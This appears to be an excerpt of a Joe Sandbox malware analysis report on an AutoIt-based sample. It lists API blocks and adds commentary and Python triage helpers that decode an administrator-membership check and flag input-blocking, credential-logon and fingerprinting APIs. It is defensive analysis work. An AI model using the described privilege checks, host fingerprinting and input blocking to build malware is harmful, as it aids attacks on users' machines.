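What the decode shows: 0x2D1400 is IOCTL_STORAGE_QUERY_PROPERTY on FILE_DEVICE_MASS_STORAGE, the 0xC input buffer matches sizeof(STORAGE_PROPERTY_QUERY), and the handle is opened with FILE_READ_ATTRIBUTES only, OPEN_EXISTING, shared read/write. That access mask is all this IOCTL needs, so the query works from an unprivileged process. Querying storage descriptors (vendor, product, serial number) this way is a common host-fingerprinting step; whether this sample uses the result for a victim identifier or for spotting virtual disks is not something the listing alone establishes.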
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B04F45
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B04F5C
                                                                                        • FreeSid.ADVAPI32(?), ref: 00B04F6C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID:
                                                                                        • API String ID: 3429775523-0
                                                                                        • Opcode ID: 68fce83ea3cfc9873fe0ada522c4f971840d53d8b76bbc3f2d0b206d1af87e6b
                                                                                        • Instruction ID: fac41e64e96661951f795b74a338186a488f9915506e9b53775f79ccce78d6ee
                                                                                        • Opcode Fuzzy Hash: 68fce83ea3cfc9873fe0ada522c4f971840d53d8b76bbc3f2d0b206d1af87e6b
                                                                                        • Instruction Fuzzy Hash: 60F04975A1130DBFDF04DFE0DC99AAEBBBCEF08201F1044A9AA01E3580E7346A048B50
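The AllocateAndInitializeSid / CheckTokenMembership / FreeSid triple above, with nSubAuthorityCount 2 and RIDs 0x20 and 0x220, is the documented way to test whether the caller holds an enabled Builtin\Administrators group SID. The identifier authority is passed by pointer and shows as `?` in the listing, so it is not visible; the example below assumes SECURITY_NT_AUTHORITY, the authority under which SECURITY_BUILTIN_DOMAIN_RID (0x20) and DOMAIN_ALIAS_RID_ADMINS (0x220) are defined. It is an added example, not the sample's code and not Joe Sandbox output: it lays the SID out in the binary form AllocateAndInitializeSid produces and converts it back to string form, so the same constants can be checked against bytes seen in a memory dump.

```python
"""Rebuild the SID from the AllocateAndInitializeSid arguments in the listing.

Added example, not code from the sample or from Joe Sandbox. Layout follows
the SID structure in winnt.h: Revision (1 byte), SubAuthorityCount (1 byte),
IdentifierAuthority (6 bytes, big-endian), then SubAuthorityCount little-endian
32-bit RIDs. Constants are from winnt.h.
"""
import struct

SECURITY_NT_AUTHORITY = 5            # SECURITY_NT_AUTHORITY = {0,0,0,0,0,5}
SECURITY_BUILTIN_DOMAIN_RID = 0x20   # 32
DOMAIN_ALIAS_RID_ADMINS = 0x220      # 544
DOMAIN_ALIAS_RID_USERS = 0x221       # 545

# Well-known SIDs keyed by (authority, sub-authorities); subset.
WELL_KNOWN = {
    (5, (18,)): "NT AUTHORITY\\SYSTEM",
    (5, (19,)): "NT AUTHORITY\\LOCAL SERVICE",
    (5, (20,)): "NT AUTHORITY\\NETWORK SERVICE",
    (5, (32, 544)): "BUILTIN\\Administrators",
    (5, (32, 545)): "BUILTIN\\Users",
}


def build_sid(authority, subauthorities):
    """Lay out a SID the way AllocateAndInitializeSid does (revision 1)."""
    count = len(subauthorities)
    if not 1 <= count <= 15:
        raise ValueError("a SID carries 1 to 15 sub-authorities")
    header = bytes([1, count]) + authority.to_bytes(6, "big")
    return header + b"".join(struct.pack("<I", rid) for rid in subauthorities)


def parse_sid(blob):
    """Inverse of build_sid; rejects truncated or mis-counted structures."""
    if len(blob) < 8 or blob[0] != 1:
        raise ValueError("not a revision-1 SID")
    count = blob[1]
    if len(blob) != 8 + 4 * count:
        raise ValueError("length does not match SubAuthorityCount")
    authority = int.from_bytes(blob[2:8], "big")
    rids = struct.unpack("<%dI" % count, blob[8:])
    return authority, rids


def is_valid_sid(blob):
    """True when parse_sid accepts the bytes (mirrors IsValidSid)."""
    try:
        parse_sid(blob)
    except ValueError:
        return False
    return True


def sid_to_string(blob):
    """Render the binary SID in the familiar S-1-<authority>-<rid>... form."""
    authority, rids = parse_sid(blob)
    return "S-1-%d-%s" % (authority, "-".join(str(r) for r in rids))


def well_known_name(blob):
    """Account name for the well-known SIDs listed above, else a marker."""
    authority, rids = parse_sid(blob)
    return WELL_KNOWN.get((authority, rids), "(not a well-known SID)")


def interpret_listing_call(sub_authority_count, *sub_authorities):
    """Recover the SID from the visible AllocateAndInitializeSid arguments.

    The listing shows nSubAuthorityCount=2 and RIDs 0x20, 0x220 followed by
    six unused zeros. The identifier authority is passed by pointer ('?' in
    the listing), so SECURITY_NT_AUTHORITY is assumed here: it is the
    authority under which these two RIDs are defined.
    """
    sid = build_sid(SECURITY_NT_AUTHORITY, sub_authorities[:sub_authority_count])
    return sid_to_string(sid), well_known_name(sid)


if __name__ == "__main__":
    print(interpret_listing_call(2, 0x20, 0x220, 0, 0, 0, 0, 0, 0))
```

CheckTokenMembership with a NULL TokenHandle, as in the listing, tests the calling thread's impersonation token, or the process's primary token when the thread is not impersonating. Under UAC an administrator running with a filtered token has the Administrators SID marked deny-only, so the check fails; what the sample learns from it is whether it is already elevated, not whether the logged-on user is an administrator.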
                                                                                        APIs
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B01B01
                                                                                        • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00B01B14
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: InputSendkeybd_event
                                                                                        • String ID:
                                                                                        • API String ID: 3536248340-0
                                                                                        • Opcode ID: 6f56eaf34bfc059dd948dd99d3ac28708f01d499b593495de1af61596b40113b
                                                                                        • Instruction ID: 51d6e1afad05bb5873889644537aa67ea4e1dcb570e344b32041c028d6a7908f
                                                                                        • Opcode Fuzzy Hash: 6f56eaf34bfc059dd948dd99d3ac28708f01d499b593495de1af61596b40113b
                                                                                        • Instruction Fuzzy Hash: B8F0A93190020CABDB04DF98C845BFE7BB8FF14305F10804AF94596292D339C611DF94
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00B19B52,?,00B3098C,?), ref: 00B0A6DA
                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00B19B52,?,00B3098C,?), ref: 00B0A6EC
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        • Opcode ID: 73d41ff3bef5a2c16c1814008e81a144bcf552e6d5140b60f8fc76a3d165416d
                                                                                        • Instruction ID: 6a4613dabe0068ce68393ce8aaa2062f0ca1f4cdd4a5ae95bbc7de2ad55a05bd
                                                                                        • Opcode Fuzzy Hash: 73d41ff3bef5a2c16c1814008e81a144bcf552e6d5140b60f8fc76a3d165416d
                                                                                        • Instruction Fuzzy Hash: 11F0A73551432EBBDB20AFA4CC48FEA77ACFF09761F008196B909D7281DA309940CBE1
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AF8F27), ref: 00AF8DFE
                                                                                        • CloseHandle.KERNEL32(?,?,00AF8F27), ref: 00AF8E10
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: 1cd668a30ec6e9f6462e3993c309c1ef57b401d75f434ede92be749af2742cdd
                                                                                        • Instruction ID: 8c3c02b8665209e0202462e3a621b65e35ca9d9a1919f7d1b51a4b740376dc4e
                                                                                        • Opcode Fuzzy Hash: 1cd668a30ec6e9f6462e3993c309c1ef57b401d75f434ede92be749af2742cdd
                                                                                        • Instruction Fuzzy Hash: CCE08C32010600EFEB262B60ED18E777BBDEF04310B20882EF49A80470CB22ACD0DB14
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AC8F87,?,?,?,00000001), ref: 00ACA38A
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00ACA393
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 397e3ee53a6b5bec5db86b7dd0b3aeba2ee74de22dcc4758e4b4efb60614acd0
                                                                                        • Instruction ID: 5d69d5f3b9a6a2e4f74824423376ab8cfe4861dc16a71e5587fcdd14afd2f1d8
                                                                                        • Opcode Fuzzy Hash: 397e3ee53a6b5bec5db86b7dd0b3aeba2ee74de22dcc4758e4b4efb60614acd0
                                                                                        • Instruction Fuzzy Hash: 1CB09231074208ABCB403B91EC19B8C3F68EF49A62F104010F60D46060CF6254508A99
                                                                                        APIs
                                                                                        • BlockInput.USER32(00000001), ref: 00B145F0
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockInput
                                                                                        • String ID:
                                                                                        • API String ID: 3456056419-0
                                                                                        • Opcode ID: a914db75d0830193d6093505170db41ad1abb706ca3b280c797cab8ff41eb528
                                                                                        • Instruction ID: 05939e6d3546291f85b2b4377182a14d1795970035f00b95a3c74a555bb96166
                                                                                        • Opcode Fuzzy Hash: a914db75d0830193d6093505170db41ad1abb706ca3b280c797cab8ff41eb528
                                                                                        • Instruction Fuzzy Hash: A1E0DF312102059FC300AF69E900A8AF7E9EFA8760F008026FC49D7350DFB0E8408B90
                                                                                        APIs
                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00B05205
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: mouse_event
                                                                                        • String ID:
                                                                                        • API String ID: 2434400541-0
                                                                                        • Opcode ID: 38fc981fdbb5440fb55de35a1112535ece0249aabd0a38dade4423c58b94d942
                                                                                        • Instruction ID: e677d377bb712f57503279dba48da3fbe9f957efd9e165664e7474bbbee59f2a
                                                                                        • Opcode Fuzzy Hash: 38fc981fdbb5440fb55de35a1112535ece0249aabd0a38dade4423c58b94d942
                                                                                        • Instruction Fuzzy Hash: 29D092B5164E0A79ED781724AE5FF7B1E88E3017C1F9446C97142AA8C2ECD46C85AE31
                                                                                        APIs
                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AF8FA7), ref: 00AF9389
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LogonUser
                                                                                        • String ID:
                                                                                        • API String ID: 1244722697-0
                                                                                        • Opcode ID: 6fb146321f06558a23065682c53e9a79636e1f2ab3a07c807659cbba902f3b3b
                                                                                        • Instruction ID: ecc5b2bf7fe8023e0c8831e626c2ce6d9f6168bd915477ed382e7c04f612df1f
                                                                                        • Opcode Fuzzy Hash: 6fb146321f06558a23065682c53e9a79636e1f2ab3a07c807659cbba902f3b3b
                                                                                        • Instruction Fuzzy Hash: 74D05E3226450EABEF019EA4DC01EAE3B69EB04B01F408111FE15C60A0C775D835AB60
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00AE0734
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: ef0ac5c4bf36a08362a702266b4b24cf10d9e8adfaefcdc32fa54239664da097
                                                                                        • Instruction ID: 6b3d7a52ca754274c60c0c4d22acb27fa70a52498581598736b6126ab5406dee
                                                                                        • Opcode Fuzzy Hash: ef0ac5c4bf36a08362a702266b4b24cf10d9e8adfaefcdc32fa54239664da097
                                                                                        • Instruction Fuzzy Hash: 2FC04CF581010DDBCB05DBA0D998EEE77BCAB04304F200055A105B2100D7749B448A71
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00ACA35A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 997b97cd843fc4037b003a7a8a2f3fe532e2a076e2e1f697fbdf8d707046f7be
                                                                                        • Instruction ID: b50da858b7290e89d3643e21d8834a7521186624595747aceb15b878609b6e53
                                                                                        • Opcode Fuzzy Hash: 997b97cd843fc4037b003a7a8a2f3fe532e2a076e2e1f697fbdf8d707046f7be
                                                                                        • Instruction Fuzzy Hash: EFA0113002020CAB8B002B82EC08888BFACEA0A2A0B008020F80C020228B32A8208A88
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,00B30980), ref: 00B23C65
                                                                                        • IsWindowVisible.USER32(?), ref: 00B23C89
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpperVisibleWindow
                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                        • API String ID: 4105515805-45149045
                                                                                        • Opcode ID: 2dd6a5bedd910206bcaca4019194f20110b9867478cd56c465c46b17303100c9
                                                                                        • Instruction ID: f815a01818deedcf9141701fbab8d49bb47ab77f63ef27a8298248c2e1d6e7bb
                                                                                        • Opcode Fuzzy Hash: 2dd6a5bedd910206bcaca4019194f20110b9867478cd56c465c46b17303100c9
                                                                                        • Instruction Fuzzy Hash: F6D15E30204315CFCB04EF50D691F6A7BE6EF95754F144898F98A5B2A2CB35EE4ACB42
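The String ID list in the block above (ADDSTRING, CURRENTTAB, HIDEDROPDOWN, ISVISIBLE, TABLEFT, ...) is the set of sub-command names accepted by AutoIt's ControlCommand() function, which the interpreter upper-cases before comparing, hence the CharUpperBuffW call in the same routine; the later block whose strings include #include, #include-once, #requireadmin and #OnAutoItStartRegister lists AutoIt script directives. That indicates the dumped module at 00AA0000 is the AutoIt runtime, so the Win32 APIs catalogued in these blocks (BlockInput, mouse_event, LogonUserW, GetUserNameW) are runtime library code backing script functions such as BlockInput(), MouseClick() and RunAs(); their presence shows what the interpreter can do, not which of them the embedded script actually calls. The Python below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses blocks in this format, groups watch-listed API references by address, and scans the String ID fields for AutoIt keywords. The watch-list, the AutoIt keyword sets and the five-hit threshold are this example's own assumptions, and the sample input is a constructed, trimmed copy of blocks from this page.

```python
"""Parse the 'APIs' / 'Similarity' blocks of a Joe Sandbox disassembly report and
triage them: which watch-listed Win32 APIs are referenced, and where, and whether
the dumped code looks like the AutoIt runtime rather than bespoke malware code."""
import re
from dataclasses import dataclass, field

# One API reference line, with or without the "Part of subcall function" prefix.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")  # "• Key: value"

# Assumed triage watch-list: this editor's choice, not something the report defines.
WATCHLIST = {
    "BlockInput": "blocks keyboard and mouse input",
    "mouse_event": "synthesises mouse input",
    "LogonUserW": "logs on with explicit credentials (run as another user)",
    "SetUnhandledExceptionFilter": "installs a top-level exception handler (anti-debug idiom)",
    "GetUserNameW": "reads the logged-on user name (host fingerprinting)",
}
# AutoIt script directives and ControlCommand() sub-command names (partial lists).
# AutoIt upper-cases the sub-command before comparing it, which is why
# CharUpperBuffW appears in the same block as these strings.
AUTOIT_DIRECTIVES = {"#include", "#include-once", "#requireadmin", "#notrayicon",
                     "#pragma compile", "#OnAutoItStartRegister", "#cs", "#ce"}
AUTOIT_CONTROLCOMMANDS = {"ADDSTRING", "CHECK", "UNCHECK", "CURRENTTAB", "DELSTRING",
                          "EDITPASTE", "FINDSTRING", "GETLINE", "GETLINECOUNT",
                          "HIDEDROPDOWN", "SHOWDROPDOWN", "ISCHECKED", "ISENABLED",
                          "ISVISIBLE", "SELECTSTRING", "TABLEFT", "TABRIGHT"}

@dataclass
class Block:
    apis: list = field(default_factory=list)     # (api, module, ref, subcall_fn or None)
    strings: list = field(default_factory=list)  # String ID entries, split on '$'
    fuzzy_hash: str = ""

def parse_blocks(text):
    """Split the report on 'APIs' headers and collect each block's fields."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Block()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append((m["api"], m["mod"], m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if m and m["key"].strip() == "String ID":
            cur.strings = [s for s in m["val"].split("$") if s]
        elif m and m["key"].strip() == "Instruction Fuzzy Hash":
            cur.fuzzy_hash = m["val"].strip()
    return blocks

def autoit_indicators(block):
    """Strings in the block that are AutoIt directives or ControlCommand names."""
    return [s for s in block.strings
            if s in AUTOIT_DIRECTIVES or s.upper() in AUTOIT_CONTROLCOMMANDS]

def triage(report_text, min_autoit_hits=5):
    """Flagged API references grouped by address, plus an AutoIt-runtime verdict."""
    blocks = parse_blocks(report_text)
    flagged, hits = {}, set()
    for b in blocks:
        for api, _mod, ref, _sub in b.apis:
            if api in WATCHLIST:
                flagged.setdefault(api, []).append(ref)
        hits.update(autoit_indicators(b))
    return {"blocks": len(blocks),
            "flagged": {api: sorted(refs) for api, refs in flagged.items()},
            "autoit_keywords": sorted(hits),
            "likely_autoit_runtime": len(hits) >= min_autoit_hits}  # assumed threshold

# Constructed input: trimmed copies of four blocks from this report.
SAMPLE_REPORT = """\
APIs
• BlockInput.USER32(00000001), ref: 00B145F0
Similarity
• API ID: BlockInput
• String ID:
• Instruction Fuzzy Hash: A1E0DF312102059FC300AF69E900A8AF7E9EFA8760F008026FC49D7350DFB0E8408B90
APIs
• CharUpperBuffW.USER32(?,?,00B30980), ref: 00B23C65
• IsWindowVisible.USER32(?), ref: 00B23C89
Similarity
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$HIDEDROPDOWN$ISVISIBLE$TABLEFT$UNCHECK
APIs
• DestroyWindow.USER32(?,?,?), ref: 00AA3072
  • Part of subcall function 00AA1F1D: InvalidateRect.USER32(?,00000000,00000001,?), ref: 00AA1F76
Similarity
• String ID: 0
APIs
Similarity
• API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
• String ID: "$#OnAutoItStartRegister$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error
"""

if __name__ == "__main__":
    for api, refs in triage(SAMPLE_REPORT)["flagged"].items():
        print(f"{api:<12} {WATCHLIST[api]:<40} at {', '.join(refs)}")
```

Feed it the plain-text export of a full report and the `flagged` map gives the `ref:` addresses to open in the disassembler first; when `likely_autoit_runtime` is true, the interesting logic is the compiled script in the resource or overlay, not these runtime functions.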
                                                                                        APIs
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00B2AC55
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00B2AC86
                                                                                        • GetSysColor.USER32(0000000F), ref: 00B2AC92
                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00B2ACAC
                                                                                        • SelectObject.GDI32(?,?), ref: 00B2ACBB
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00B2ACE6
                                                                                        • GetSysColor.USER32(00000010), ref: 00B2ACEE
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00B2ACF5
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00B2AD04
                                                                                        • DeleteObject.GDI32(00000000), ref: 00B2AD0B
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00B2AD56
                                                                                        • FillRect.USER32(?,?,?), ref: 00B2AD88
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00B2ADB3
                                                                                          • Part of subcall function 00B2AF18: GetSysColor.USER32(00000012), ref: 00B2AF51
                                                                                          • Part of subcall function 00B2AF18: SetTextColor.GDI32(?,?), ref: 00B2AF55
                                                                                          • Part of subcall function 00B2AF18: GetSysColorBrush.USER32(0000000F), ref: 00B2AF6B
                                                                                          • Part of subcall function 00B2AF18: GetSysColor.USER32(0000000F), ref: 00B2AF76
                                                                                          • Part of subcall function 00B2AF18: GetSysColor.USER32(00000011), ref: 00B2AF93
                                                                                          • Part of subcall function 00B2AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B2AFA1
                                                                                          • Part of subcall function 00B2AF18: SelectObject.GDI32(?,00000000), ref: 00B2AFB2
